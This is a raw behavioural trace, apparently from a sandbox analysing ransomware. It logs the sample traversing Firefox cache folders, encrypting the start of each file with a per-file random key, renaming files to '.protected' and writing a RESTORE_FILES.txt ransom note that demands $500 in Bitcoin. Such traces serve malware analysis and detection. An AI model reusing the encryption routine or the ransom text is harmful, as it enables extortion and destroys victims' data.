lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.215] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.215] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.215] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\..") returned 103 [0086.215] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.215] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.215] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="Windows") returned -1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="Program Files") returned -1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="Program Files (x86)") returned -1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="$Recycle.bin") returned 1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="System Volume Information") returned -1 [0086.215] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0086.215] StrStrIW (lpFirst="16A09d01", lpSrch=".protected") returned 0x0 [0086.215] lstrcmpW (lpString1="16A09d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.215] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.215] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0086.216] StrStrW (lpFirst="16A09d01", lpSrch=".txt") returned 0x0 [0086.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0086.216] StrStrW (lpFirst="16A09d01", lpSrch=".rar") returned 0x0 [0086.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0086.216] StrStrW (lpFirst="16A09d01", lpSrch=".zip") returned 0x0 [0086.216] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.218] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.218] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.218] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.218] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.218] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.218] CloseHandle (hObject=0x160) returned 1 [0086.219] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.protected") returned 119 [0086.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01.protected")) returned 1 [0086.220] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.220] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.220] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\RESTORE_FILES.txt") returned 118 [0086.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.220] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.220] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.221] lstrlenA 
(lpString="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") returned 684 [0086.221] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.221] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.221] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.221] CloseHandle (hObject=0x15c) returned 1 [0086.222] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="Windows") returned -1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="Program Files") returned -1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="Program Files (x86)") returned -1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="$Recycle.bin") returned 1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="System Volume Information") returned -1 [0086.222] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C") returned 100 [0086.222] lstrcmpW (lpString1="2C", lpString2=".") returned 1 [0086.222] lstrcmpW (lpString1="2C", lpString2="..") returned 1 [0086.222] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\*") returned 102 [0086.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.222] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.222] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.222] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.222] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.222] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.222] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\.") returned 102 [0086.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.222] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.222] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.222] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.222] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.222] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.223] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.223] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\..") returned 103 [0086.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.223] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="Windows") returned -1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="Program Files") returned -1 [0086.223] 
lstrcmpiW (lpString1="24B53d01", lpString2="Program Files (x86)") returned -1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="$Recycle.bin") returned 1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="System Volume Information") returned -1 [0086.223] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0086.223] StrStrIW (lpFirst="24B53d01", lpSrch=".protected") returned 0x0 [0086.223] lstrcmpW (lpString1="24B53d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.223] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0086.224] StrStrW (lpFirst="24B53d01", lpSrch=".txt") returned 0x0 [0086.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0086.224] StrStrW (lpFirst="24B53d01", lpSrch=".rar") returned 0x0 [0086.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0086.224] StrStrW (lpFirst="24B53d01", lpSrch=".zip") returned 0x0 [0086.225] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.234] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.234] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.235] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.235] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.235] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.235] CloseHandle (hObject=0x160) returned 1 [0086.235] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.protected") returned 119 [0086.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01.protected")) returned 1 [0086.236] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.236] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.236] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\RESTORE_FILES.txt") returned 118 [0086.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.237] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.237] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.238] lstrlenA (lpString="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") returned 684 [0086.238] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.238] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.238] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.238] CloseHandle (hObject=0x15c) returned 1 [0086.244] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.244] lstrcmpiW (lpString1="61", lpString2="Windows") returned -1 [0086.244] lstrcmpiW (lpString1="61", lpString2="Program Files") returned -1 [0086.244] lstrcmpiW (lpString1="61", lpString2="Program Files (x86)") returned -1 [0086.244] lstrcmpiW (lpString1="61", lpString2="$Recycle.bin") returned 1 [0086.244] lstrcmpiW (lpString1="61", lpString2="System Volume Information") returned -1 [0086.244] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61") returned 100 [0086.244] lstrcmpW (lpString1="61", lpString2=".") returned 1 [0086.244] lstrcmpW (lpString1="61", lpString2="..") returned 1 [0086.244] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\*") returned 102 [0086.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.244] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.244] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.244] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.244] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.244] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.244] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\.") returned 102 [0086.244] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.245] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.245] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.245] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.245] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.245] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.245] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.245] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\..") returned 103 [0086.245] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.245] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.245] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="Windows") returned -1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="Program Files") returned -1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="Program Files (x86)") returned -1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="$Recycle.bin") returned 1 [0086.245] lstrcmpiW (lpString1="28E95d01", lpString2="System Volume Information") returned -1 [0086.245] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0086.245] StrStrIW (lpFirst="28E95d01", lpSrch=".protected") returned 0x0 [0086.245] lstrcmpW (lpString1="28E95d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.245] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0086.246] StrStrW (lpFirst="28E95d01", lpSrch=".txt") returned 0x0 [0086.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0086.246] StrStrW (lpFirst="28E95d01", lpSrch=".rar") returned 0x0 [0086.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0086.246] StrStrW (lpFirst="28E95d01", lpSrch=".zip") returned 0x0 [0086.246] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.255] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.255] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | 
